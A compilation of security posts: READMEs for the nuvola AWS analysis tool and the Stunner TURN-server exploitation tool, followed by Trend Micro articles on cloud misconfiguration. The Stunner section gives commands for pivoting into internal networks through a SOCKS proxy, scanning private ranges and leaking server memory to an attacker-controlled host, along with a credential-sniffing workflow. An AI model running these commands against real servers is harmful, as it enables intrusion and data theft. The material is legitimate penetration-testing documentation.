
nuvola - Tool To Dump And Perform Automatic And Manual Security Analysis On AWS Environment Configurations And Services

nuvola (with the lowercase n) is a tool to dump and perform automatic and manual security analysis on AWS environment configurations and services, using predefined, extensible and custom rules created with a simple YAML syntax.

The general idea behind this project is to create an abstracted digital twin of a cloud platform. More concretely, nuvola mirrors the approach BloodHound takes for Active Directory analysis, but applied to cloud environments (at the moment only AWS).

Using a graph database also increases the chances of finding different and innovative attack paths, and the result can be used as an offline, centralised and lightweight digital twin.


Quick Start

Requirements

  • docker-compose installed
  • an AWS account configured for use with awscli, with read access to the cloud resources; read-only credentials are preferable (the policy arn:aws:iam::aws:policy/ReadOnlyAccess is fine)

Setup

  1. Clone the repository
git clone --depth=1 https://github.com/primait/nuvola.git; cd nuvola
  2. Create and edit, if required, the .env file to set your DB username/password/URL
cp .env_example .env;
  3. Start the Neo4j docker instance
make start
  4. Build the tool
make build

Usage

  1. First, dump all the supported AWS services configurations and load the data into the Neo4j database:
./nuvola dump -profile default_RO -outputdir ~/DumpDumpFolder -format zip
  2. To import a previously executed dump operation into the Neo4j database:
./nuvola assess -import ~/DumpDumpFolder/nuvola-default_RO_20220901.zip
  3. To only perform static assessments on the data loaded into the Neo4j database using the predefined ruleset:
./nuvola assess
  4. Or use Neo4j Browser to manually explore the digital twin; a minimal scripted-query sketch follows.
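If you prefer scripted queries over the Browser UI, a minimal sketch using the official Python neo4j driver is shown below. The Bolt URL and credentials are assumptions; use the values you set in your .env.

# Minimal sketch: query the nuvola Neo4j database from Python.
# Assumes Neo4j is reachable on bolt://localhost:7687 with the credentials from your .env.
from neo4j import GraphDatabase

driver = GraphDatabase.driver("bolt://localhost:7687", auth=("neo4j", "password"))

with driver.session() as session:
    # Count nodes per label to get a feel for what was imported
    query = "MATCH (n) RETURN labels(n) AS labels, count(*) AS c ORDER BY c DESC"
    for record in session.run(query):
        print(record["labels"], record["c"])

driver.close()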

About nuvola

To get started with nuvola and its database schema, check out the nuvola Wiki.

No data is sent or shared with Prima Assicurazioni.

How to contribute

  • reporting bugs and issues
  • reporting new improvements
  • reviewing issues and pull requests
  • fixing bugs and issues
  • creating new rules
  • improving the overall quality

Presentations

License

nuvola uses graph theory to reveal possible attack paths and security misconfigurations on cloud environments.

This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.

This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.

You should have received a copy of the GNU General Public License along with this repository and program. If not, see http://www.gnu.org/licenses/.



Stunner - Tool To Test And Exploit STUN, TURN And TURN Over TCP Servers


Stunner is a tool to test and exploit STUN, TURN and TURN over TCP servers. TURN is a protocol mostly used in videoconferencing and audio chats (WebRTC).

If you find a misconfigured server you can use this tool to open a local socks proxy that relays all traffic via the TURN protocol into the internal network behind the server.

I developed this tool during a test of Cisco Expressway which resulted in some vulnerabilities: https://firefart.at/post/multiple_vulnerabilities_cisco_expressway/

To get the required username and password you need to fetch them using an out-of-band method like sniffing the Connect request from a web browser with Burp. I added an example workflow at the bottom of the readme on how you would test such a server.


LICENSE

This work is licensed under the Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International License. To view a copy of this license, visit http://creativecommons.org/licenses/by-nc-sa/4.0/ or send a letter to Creative Commons, PO Box 1866, Mountain View, CA 94042, USA.

implemented RFCs

STUN: RFC 5389

TURN: RFC 5766

TURN for TCP: RFC 6062

TURN Extension for IPv6: RFC 6156
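As a quick protocol-level illustration (my own sketch, not part of Stunner), the snippet below builds the minimal RFC 5389 STUN binding request that these tools start from and prints the type of the raw response; the host and port are placeholders.

# Minimal RFC 5389 STUN binding request over UDP (illustrative sketch, not Stunner code).
# Replace HOST/PORT with a server you are allowed to test.
import os
import socket
import struct

HOST, PORT = "x.x.x.x", 3478  # placeholder target

# Header: type=0x0001 (Binding Request), length=0, magic cookie, 12-byte transaction ID
request = struct.pack("!HHI12s", 0x0001, 0, 0x2112A442, os.urandom(12))

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.settimeout(2)
sock.sendto(request, (HOST, PORT))
data, _ = sock.recvfrom(4096)

msg_type, msg_len = struct.unpack("!HH", data[:4])
print(f"response type=0x{msg_type:04x} length={msg_len}")  # 0x0101 = Binding Success Response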

Available Commands

info

This command prints some info about the STUN or TURN server, like supported protocols and attributes such as the software in use.

Options

--debug, -d                   enable debug output (default: false)
--turnserver value, -s value  turn server to connect to in the format host:port
--tls                         Use TLS for connecting (false in most tests) (default: false)
--timeout value               connect timeout to turn server (default: 1s)
--help, -h                    show help (default: false)

Example

./stunner info -s x.x.x.x:443

range-scan

This command tries several private and restricted ranges to see if the TURN server is configured to allow connections to those IP addresses. If a specific range is not prohibited, you can enumerate it further with the other provided commands. If an IP is reachable, it means the TURN server will forward traffic to it.
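For reference, these are the sorts of private and restricted IPv4 ranges such a scan walks through; the shortlist below is my own illustration (Stunner's internal target list may differ).

# Illustrative shortlist of private/restricted IPv4 ranges a range scan typically covers.
# This is not Stunner's internal list.
import ipaddress

ranges = [
    "10.0.0.0/8",      # RFC 1918
    "172.16.0.0/12",   # RFC 1918
    "192.168.0.0/16",  # RFC 1918
    "127.0.0.0/8",     # loopback (the TURN server itself)
    "169.254.0.0/16",  # link-local / cloud metadata range
    "100.64.0.0/10",   # carrier-grade NAT
]

for r in ranges:
    net = ipaddress.ip_network(r)
    print(f"{r:<16} {net.num_addresses} addresses")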

Options

--debug, -d                   enable debug output (default: false)
--turnserver value, -s value  turn server to connect to in the format host:port
--tls                         Use TLS for connecting (false in most tests) (default: false)
--protocol value              protocol to use when connecting to the TURN server. Supported values: tcp and udp (default: "udp")
--timeout value               connect timeout to turn server (default: 1s)
--username value, -u value    username for the turn server
--password value, -p value    password for the turn server
--help, -h                    show help (default: false)

Example

TCP based TURN connection (connection from you to the TURN server):

./stunner range-scan -s x.x.x.x:3478 -u username -p password --protocol tcp

UDP based TURN connection (connection from you to the TURN server):

./stunner range-scan -s x.x.x.x:3478 -u username -p password --protocol udp

socks

This is one of the most useful commands for TURN servers that support TCP connections to backend servers. It launches a local SOCKS5 server with no authentication and relays all TCP traffic over the TURN protocol (UDP via SOCKS is currently not supported). If the server is misconfigured, it will forward the traffic to internal addresses, so this can be used to reach internal systems and abuse the server as a proxy into the internal network. If you choose to also do DNS lookups over SOCKS, they are resolved using your local nameserver, so it's best to work with private IPv4 and IPv6 addresses. Please be aware that this module can only relay TCP traffic.

Options

--debug, -d                   enable debug output (default: false)
--turnserver value, -s value  turn server to connect to in the format host:port
--tls                         Use TLS for connecting (false in most tests) (default: false)
--protocol value              protocol to use when connecting to the TURN server. Supported values: tcp and udp (default: "udp")
--timeout value               connect timeout to turn server (default: 1s)
--username value, -u value    username for the turn server
--password value, -p value    password for the turn server
--listen value, -l value      Address and port to listen on (default: "127.0.0.1:1080")
--drop-public, -x             Drop requests to public IPs. This is handy if the target can not connect to the internet and your browser want's to check TLS certificates via the connection. (default: true)
--help, -h                    show help (default: false)

Example

./stunner socks -s x.x.x.x:3478 -u username -p password -x

After starting the proxy, open your browser, point it at a SOCKS5 proxy on 127.0.0.1:1080 (be sure not to enable the "bypass local addresses" option, as we want to reach the remote side's local addresses) and call the IP of your choice in the browser.

Example: https://127.0.0.1, https://127.0.0.1:8443 or https://[::1]:8443 (these will call the ports on the tested TURN server from its local interfaces).

You can also configure proxychains to use this proxy (but it will be very slow, as each request results in multiple requests to enable the proxying). Just edit /etc/proxychains.conf and enter the value socks5 127.0.0.1 1080 under ProxyList.

Example of nmap over this SOCKS5 proxy with a correctly configured proxychains (note the -sT: only full TCP connect scans go through the SOCKS5 proxy, SYN scans do not):

sudo proxychains nmap -sT -p 80,443,8443 -sV 127.0.0.1
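Scripted access through the proxy works too. Below is a minimal sketch using Python requests with SOCKS support (requires the PySocks extra: pip install "requests[socks]"); the target URL is a placeholder following the examples above.

# Minimal sketch: reach a host behind the TURN server through the stunner SOCKS5 proxy.
# Requires: pip install "requests[socks]"
import requests

proxies = {
    "http": "socks5://127.0.0.1:1080",
    "https": "socks5://127.0.0.1:1080",
}

# verify=False because internal services often present self-signed certificates
resp = requests.get("https://127.0.0.1:8443", proxies=proxies, verify=False, timeout=10)
print(resp.status_code, resp.headers.get("Server"))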

brute-transports

This will most likely yield no usable information, but it can be useful to enumerate all transports (protocols to internal systems) supported by the server. It might reveal some custom protocol implementations, but mostly it will only return the defaults.

Options

--debug, -d                   enable debug output (default: false)
--turnserver value, -s value  turn server to connect to in the format host:port
--tls                         Use TLS for connecting (false in most tests) (default: false)
--protocol value              protocol to use when connecting to the TURN server. Supported values: tcp and udp (default: "udp")
--timeout value               connect timeout to turn server (default: 1s)
--username value, -u value    username for the turn server
--password value, -p value    password for the turn server
--help, -h                    show help (default: false)

Example

./stunner brute-transports -s x.x.x.x:3478 -u username -p password

memoryleak

This attack works the following way: the server takes the data to send to a target (which must be a high port, > 1024, in most cases) as a TLV (Type Length Value). This exploit uses a big length with a short value. If the server does not check the boundaries of the TLV, it might send memory up to the declared length to the target. Cisco Expressway was confirmed vulnerable to this, but according to Cisco it only leaked memory of the current session.
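To make the TLV idea concrete, here is a small illustrative sketch (not the actual exploit code) of a STUN/TURN-style attribute whose declared length is far larger than the value actually supplied; a server that trusts the length field and copies that many bytes can end up sending its own memory on to the target.

# Illustration of the TLV trick described above (not the actual exploit code).
# STUN/TURN attributes are TLVs: 2-byte type, 2-byte length, then the value.
import struct

attr_type = 0x0013        # DATA attribute (RFC 5766) carries the payload relayed to the target
claimed_length = 35510    # the length we *claim* the value has (matches the --size default)
actual_value = b"A" * 4   # ...but we only supply 4 bytes

tlv = struct.pack("!HH", attr_type, claimed_length) + actual_value
print(len(tlv), "bytes on the wire, but the header promises", claimed_length)
# A server that trusts claimed_length and copies that many bytes from its buffer
# may leak up to ~35 KB of its own memory to the target.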

Options

--debug, -d                   enable debug output (default: false)
--turnserver value, -s value  turn server to connect to in the format host:port
--tls                         Use TLS for connecting (false in most tests) (default: false)
--protocol value              protocol to use when connecting to the TURN server. Supported values: tcp and udp (default: "udp")
--timeout value               connect timeout to turn server (default: 1s)
--username value, -u value    username for the turn server
--password value, -p value    password for the turn server
--target value, -t value      Target to leak memory to in the form host:port. Should be a public server under your control
--size value                  Size of the buffer to leak (default: 35510)
--help, -h                    show help (default: false)

Example

To receive the data we need to set up a receiver on a server with a public IP. Firewalls are normally configured to only allow high ports (>1024) from TURN servers, so be sure to use a high port like 8080 in this example when connecting out to the internet.

Then execute the following statement on your machine, adding the public IP of your receiver to the -t parameter:

./stunner memoryleak -s x.x.x.x:3478 -u username -p password -t y.y.y.y:8080

If it works you should see big loads of memory coming in, otherwise you will only see short messages.

udp-scanner

If a TURN server allows UDP connections to targets, this scanner can be used to scan all private IP ranges and send them SNMP and DNS requests. As this checks a lot of IPs, it can take multiple days to complete, so use it with caution or specify smaller targets via the parameters. You need to supply an SNMP community string that will be tried and a domain name that will be resolved on each IP. For the domain name you can, for example, use Burp Collaborator.

Options

--debug, -d                   enable debug output (default: false)
--turnserver value, -s value  turn server to connect to in the format host:port
--tls                         Use TLS for connecting (false in most tests) (default: false)
--protocol value              protocol to use when connecting to the TURN server. Supported values: tcp and udp (default: "udp")
--timeout value               connect timeout to turn server (default: 1s)
--username value, -u value    username for the turn server
--password value, -p value    password for the turn server
--community-string value      SNMP community string to use for scanning (default: "public")
--domain value                domain name to resolve on internal DNS servers during scanning
--ip value                    Scan single IP instead of whole private range. If left empty all private ranges are scanned. Accepts single IPs or CIDR format. (accepts multiple inputs)
--help, -h                    show help (default: false)

Example

./stunner udp-scanner -s x.x.x.x:3478 -u username -p password --community-string public --domain domain.you.control

tcp-scanner

Same as udp-scanner, but it sends out HTTP requests to the specified ports (HTTPS is not supported).

Options

--debug, -d                   enable debug output (default: false)
--turnserver value, -s value  turn server to connect to in the format host:port
--tls                         Use TLS for connecting (false in most tests) (default: false)
--protocol value              protocol to use when connecting to the TURN server. Supported values: tcp and udp (default: "udp")
--timeout value               connect timeout to turn server (default: 1s)
--username value, -u value    username for the turn server
--password value, -p value    password for the turn server
--ports value                 Ports to check (default: "80,443,8080,8081")
--ip value                    Scan single IP instead of whole private range. If left empty all private ranges are scanned. Accepts single IPs or CIDR format. (accepts multiple inputs)
--help, -h                    show help (default: false)

Example

./stunner tcp-scanner -s x.x.x.x:3478 -u username -p password --ports "80,443,8080,8081"

Example workflow

Let's say you find a service using WebRTC and want to test it.

First step is to get the required data. I suggest launching Wireshark in the background and joining a meeting via Burp to collect all HTTP and WebSocket traffic. Next, search your Burp history for keywords related to TURN like 3478, password, credential and username (be sure to also check the WebSocket tab for these keywords). This might reveal the TURN server, the protocol (UDP and TCP endpoints might have different ports) and the credentials used to connect. If you can't find the data in Burp, start looking at Wireshark to identify the traffic. If it's on a non-standard port (anything other than 3478), decode the protocol in Wireshark via a right click as STUN. This should show you the username used to connect, and you can use that information to search Burp's history even further for the required data. Please note that Wireshark can't show you the password, as the password is used to hash some packet contents and so cannot be reversed.

Next step would be to issue the info command to the TURN server using the correct port and protocol obtained from Burp.

If this works, the next step is a range-scan. If this allows any traffic to internal systems, you can exploit it further, but be aware that UDP has only limited use cases.

If TCP connections to internal systems are allowed, simply launch the socks command, set your SOCKS proxy to 127.0.0.1:1080 and access the allowed IPs via a browser. You can try 127.0.0.1:443 and other IPs to find management interfaces.



Are You Promoting Security Fluency in your Organization?

 

Migrating to the cloud is hard. The PowerPoint deck and pretty architectures are drawn up quickly but the work required to make the move will take months and possibly years.

 

The early stages require significant effort by teams to learn new technologies (the cloud services themselves) and new ways of the working (the shared responsibility model).

 

In the early days of your cloud efforts, the cloud center of expertise is a logical model to follow.

 

Center of Excellence

 

A cloud center of excellence is exactly what it sounds like. Your organization forms a new team—or an existing team grows into the role—that focuses on setting cloud standards and architectures.

 

They are often the “go-to” team for any cloud questions. From the simple (“What’s an Amazon S3 bucket?”), to the nuanced (“What are the advantages of Amazon Aurora over RDS?”), to the complex (“What’s the optimum index/sort keying for this DynamoDB table?”).

 

The cloud center of excellence is the one-stop shop for cloud in your organization. At the beginning, this organizational design choice can greatly accelerate the adoption of cloud technologies.

 

Too Central

 

The problem is that accelerated adoption doesn’t necessarily correlate with accelerated understanding and learning.

 

In fact, as the center of excellence grows more successful, organizational learning fails in inverse proportion, creating a general lack of cloud fluency.

 

Cloud fluency is an idea introduced by Forrest Brazeal at A Cloud Guru that describes the general ability of all teams within the organization to discuss cloud technologies and solutions. Forrest’s blog post shines a light on this situation.

 

Our own Mark Nunnikhoven also spoke to Forrest on episode 2 of season 2 of #LetsTalkCloud.

 

Even though the cloud center of excellence team sets out to teach everyone and raise the bar, the work soon piles up and the team quickly shifts away from an educational mandate to a “fix everything” one.

 

What was once a cloud accelerator is now a place of burnout for your top, hard-to-replace cloud talent.

 

Security’s Past

 

If you’ve paid attention to how cybersecurity teams operate within organizations, you have probably spotted a number of very concerning similarities.

 

Cybersecurity teams are also considered a center of excellence and the central team within the organization for security knowledge.

 

Most requests for security architecture, advice, operations, and generally anything that includes the prefix “cyber”, the word “risk”, or hints of “hacking” get routed to this team.

 

This isn’t the security team’s fault. Over the years, systems have increased in complexity, more and more incidents occur, and security teams rarely get the opportunity to look ahead. They are too busy stuck in “firefighting mode” to take as step back and re-evaluate the organizational design structure they work within.

 

According to Gartner, for every 750 employees in an organization, only one is dedicated to cybersecurity. Those are impossible odds that have led to the massive security skills gap.

 

Fluency Is The Way Forward

 

Security needs to follow the example of cloud fluency. We need “security fluency” in order to improve the security posture of the systems we build and to reduce the risk our organizations face.

 

This is the reason that security teams need to turn their efforts to educating development teams. DevSecOps is a term chock full of misconceptions, and it lacks the context to drive the needed changes, but it is handy for raising awareness of the lack of security fluency.

 

Successful adoption of a DevOps philosophy is all about removing barriers to customer success. Providing teams with the tools and autonomy they require is a critical factor in their success.

 

Security is just one aspect of the development team’s toolkit. It’s up to the current security team to help educate them on the principles driving modern cybersecurity and how to ensure that the systems they build work as intended…and only as intended.


Knowing your shared security responsibility in Microsoft Azure and avoiding misconfigurations

 

Trend Micro is excited to launch new Trend Micro Cloud One™ – Conformity capabilities that will strengthen protection for Azure resources.

 

As with any launch, there is a lot of new information, so we decided to sit down with one of the founders of Conformity, Mike Rahmati. Mike is a technologist at heart, with a proven track record of success in the development of software systems that are resilient to failure and grow and scale dynamically through cloud, open-source, agile, and lean disciplines. In the interview, we picked Mike’s brain on how these new capabilities can help customers prevent or easily remediate misconfigurations on Azure. Let’s dive in.

 

What are the common business problems that customers encounter when building on or moving their applications to Azure or Amazon Web Services (AWS)?

The common problem is there are a lot of tools and cloud services out there. Organizations are looking for tool consolidation and visibility into their cloud environment. Shadow IT and business units spinning up their own cloud accounts is a real challenge for IT organizations to keep on top of. Compliance, security, and governance controls are not necessarily top of mind for business units that are innovating at incredible speeds. That is why it is so powerful to have a tool that can provide visibility into your cloud environment and show where you are potentially vulnerable from a security and compliance perspective.

 

Common misconfigurations on AWS are an open Amazon Elastic Compute Cloud (EC2) instance or a misconfigured IAM policy. What is the equivalent for Microsoft?

The common misconfigurations are actually quite similar to what we’ve seen with AWS. During the product preview phase, we saw customers with many of the same kinds of misconfiguration issues as on AWS. For example, Microsoft Azure Blob Storage is the equivalent of Amazon S3, and it is a common source of misconfigurations. We have observed misconfigurations in two main areas: Firewall and Web Application Firewall (WAF), the latter being equivalent to AWS WAF. The Firewall is similar to networking configuration in AWS: it provides inbound protection for non-HTTP protocols and network-related protection for all ports and protocols. It is important to note that this is based on the 100 best practices and 15 services we currently support for Azure (and growing), whereas for AWS we have over 600 best practices in total, with over 70 controls with auto-remediation.

 

Can you tell me about the CIS Microsoft Azure Foundations Benchmark?

We are thrilled to support the CIS Microsoft Azure Foundations Benchmark. It includes automated checks and remediation recommendations for the following: Identity and Access Management, Security Center, Storage Accounts, Database Services, Logging and Monitoring, Networking, Virtual Machines, and App Service. There are over 100 best practices in this framework, and we have rules built to check for all of them to ensure cloud builders are avoiding risk in their Azure environments.

Can you tell me a little bit about the Microsoft Shared Responsibility Model?

In terms of the shared responsibility model, it’s very similar to AWS. Security OF the cloud is Microsoft’s responsibility, while security IN the cloud is the customer’s responsibility. Microsoft’s ecosystem is growing rapidly, and there are a lot of services that you need to know in order to configure them properly. With Conformity, customers only need to know how to properly configure the core services, according to best practices, and then we can help you take it to the next level.

Can you give an example of how the shared responsibility model is used?

Yes. Imagine you have a Microsoft Azure Blob Storage that includes sensitive data. Then, by accident, someone makes it public. The customer might not be able to afford an hour, two hours, or even days to close that security gap.

In just a few minutes, Conformity will alert you to your risk status, provide remediation recommendations, and, for our AWS checks, give you the ability to set up auto-remediation. Auto-remediation can be very helpful, as it can close the gap in near-real time for customers.
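As a concrete, deliberately simplified illustration of closing that gap yourself (this is not how Conformity's auto-remediation works), the sketch below uses the azure-storage-blob SDK to turn off anonymous access on a container; the container name and connection-string variable are placeholders.

# Simplified illustration (not Conformity): detect and remove anonymous access on
# an Azure Blob Storage container. Connection string and container name are placeholders.
import os
from azure.storage.blob import ContainerClient

container = ContainerClient.from_connection_string(
    os.environ["AZURE_STORAGE_CONNECTION_STRING"],
    container_name="sensitive-data",
)

access = container.get_container_access_policy()
if access.get("public_access"):  # "blob" or "container" means anonymous reads are allowed
    # Clearing public_access closes the gap; for brevity this also resets any
    # stored access policies on the container.
    container.set_container_access_policy(signed_identifiers={}, public_access=None)
    print("Anonymous access removed")
else:
    print("Container is already private")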

What are next steps for our readers?

I’d say that whether your cloud exploration is just taking shape, you’re midway through a migration, or you’re already running complex workloads in the cloud, we can help. You can gain full visibility of your infrastructure with continuous cloud security and compliance posture management. We can do the heavy lifting so you can focus on innovating and growing. Also, you can ask anyone from our team to set you up with a complimentary cloud health check. Our cloud engineers are happy to provide an AWS and/or Azure assessment to see if you are building a secure, compliant, and reliable cloud infrastructure. You can find out your risk level in just 10 minutes.

 

Get started today with a 60-day free trial >

Check out our knowledge base of Azure best practice rules>

Learn more >

 

Do you see value in building a security culture that is shifted left?

Yes, we have done this for our customers using AWS and it has been very successful. The more we talk about shifting security left, the better; that’s where we help customers build a security culture. Every cloud customer is struggling to implement security earlier in the development cycle, and they need tools. Conformity is DevOps- and DevSecOps-friendly and helps them build a security culture that is shifted left.

We help customers shift security left by integrating the Conformity API into their CI/CD pipeline. The product also has preventative controls, which our API and template scanners provide. The idea is we help customers shift security left to identify those misconfigurations early on, even before they’re actually deployed into their environments.

We also help them scan their infrastructure-as-code templates before being deployed into the cloud. Customers need a tool to bake into their CI/CD pipeline. Shifting left doesn’t simply mean having a reporting tool, but rather a tool that allows them to shift security left. That’s where our product, Conformity, can help.

 


Cloud Transformation Is The Biggest Opportunity To Fix Security

This overview builds on the recent report from Trend Micro Research on cloud-specific security gaps, which can be found here.

Don’t be cloud-weary. Hear us out.

Recently, a major tipping point was reached in the IT world when more than half of new IT spending went to cloud over non-cloud. So rather than being the exception, cloud-based operations have become the rule.

However, too many security solutions and vendors still treat the cloud like an exception – or at least not as a primary use case. The approach remains “and cloud” rather than “cloud and.”

Attackers have made this transition. Criminals know that business security is generally behind the curve with its approach to the cloud and take advantage of the lack of security experience surrounding new cloud environments. This leads to ransomware, cryptocurrency mining and data exfiltration attacks targeting cloud environments, to name a few.

Why Cloud?

There are many reasons why companies transition to the cloud. Lower costs, improved efficiencies and faster time to market are some of the primary benefits touted by cloud providers.

These benefits come with common misconceptions. While efficiency and time to market can be greatly improved by transitioning to the cloud, this does not happen overnight. It can take years to move complete data centers and operational applications to the cloud, and the benefits won’t be fully realized until the majority of functional data has been transitioned.

Misconfiguration at the User Level is the Biggest Security Risk in the Cloud

Cloud providers have built-in security measures that leave many system administrators, IT directors and CTOs feeling content with the security of their data. We’ve heard it many times – “My cloud provider takes care of security, why would I need to do anything additional?”

This way of thinking ignores the shared responsibility model for security in the cloud. While cloud providers secure the platform as a whole, companies are responsible for the security of their data hosted in those platforms.

Misunderstanding the shared responsibility model leads to the No. 1 security risk associated with the cloud: Misconfiguration.

You may be thinking, “But what about ransomware and cryptomining and exploits?” Those other attack types are mostly only possible when one of the three misconfiguration categories below is present.

You can forget about all the worst-case, overly complex attacks: misconfigurations are the greatest risk and should be the No. 1 concern. They fall into three categories:

  1. Misconfiguration of the native cloud environment
  2. Not securing equally across multi-cloud environments (i.e. different brands of cloud service providers)
  3. Not securing equally to your on-premises (non-cloud) data centers

How Big is The Misconfiguration Problem?

Trend Micro Cloud One™ – Conformity identifies an average of 230 million misconfigurations per day.

To further understand the state of cloud misconfigurations, Trend Micro Research recently investigated cloud-specific cyber attacks. The report found a large number of websites partially hosted in world-writable cloud-based storage systems. Despite these environments being secure by default, settings can be manually changed to allow more access than actually needed.

These misconfigurations are typically put in place without knowing the potential consequences. But once in place, it is simple to scan the internet to find this type of misconfiguration, and criminals are exploiting them for profit.

Why Do Misconfigurations Happen?

The risk of misconfigurations may seem obvious in theory, but in practice, overloaded IT teams are often simply trying to streamline workflows to make internal processes easier. So, settings are changed to give read and/or write access to anyone in the organization with the necessary credentials. What is not realized is that this level of exposure can be found and exploited by criminals.

We expect this trend will increase in 2020, as more cloud-based services and applications gain popularity with companies using a DevOps workflow. Teams are likely to misconfigure more cloud-based applications, unintentionally exposing corporate data to the internet – and to criminals.

Our prediction is that through 2025, more than 75% of successful attacks on cloud environments will be caused by missing or misconfigured security by cloud customers rather than cloud providers.

How to Protect Against Misconfiguration

Nearly all data breaches involving cloud services have been caused by misconfigurations, and these are easily preventable with some basic cyber hygiene and regular monitoring of your configurations.

Your data and applications in the cloud are only as secure as you make them. There are enough tools available today to make your cloud environment – and the majority of your IT spend – at least as secure as your non-cloud legacy systems.

You can secure your cloud data and applications today, especially knowing that attackers are already cloud-aware and delivering vulnerabilities as a service. Here are a few best practices for securing your cloud environment:

  • Employ the principle of least privilege: Access is only given to users who need it, rather than leaving permissions open to anyone.
  • Understand your part of the Shared Responsibility Model: While cloud service providers have built in security, the companies using their services are responsible for securing their data.
  • Monitor your cloud infrastructure for misconfigured and exposed systems: Tools are available to identify misconfigurations and exposures in your cloud environments (a minimal self-check sketch follows this list).
  • Educate your DevOps teams about security: Security should be built into the DevOps process.
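As a taste of what that monitoring looks like in practice, here is a minimal, illustrative boto3 sketch (not Conformity's implementation) that flags S3 buckets whose ACLs grant access to everyone; it uses whatever AWS credentials your environment already provides.

# Minimal illustrative check (not Conformity): flag S3 buckets whose ACL grants access
# to "AllUsers" or "AuthenticatedUsers". Uses your default AWS credentials.
import boto3

PUBLIC_GRANTEES = {
    "http://acs.amazonaws.com/groups/global/AllUsers",
    "http://acs.amazonaws.com/groups/global/AuthenticatedUsers",
}

s3 = boto3.client("s3")

for bucket in s3.list_buckets()["Buckets"]:
    name = bucket["Name"]
    acl = s3.get_bucket_acl(Bucket=name)
    public_permissions = [
        grant["Permission"]
        for grant in acl["Grants"]
        if grant["Grantee"].get("URI") in PUBLIC_GRANTEES
    ]
    if public_permissions:
        print(f"{name}: publicly granted {', '.join(public_permissions)}")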

To read the complete Trend Micro Research report, please visit: https://www.trendmicro.com/vinfo/us/security/news/virtualization-and-cloud/exploring-common-threats-to-cloud-security.

For additional information on Trend Micro’s approach to cloud security, click here: https://www.trendmicro.com/en_us/business/products/hybrid-cloud.html.

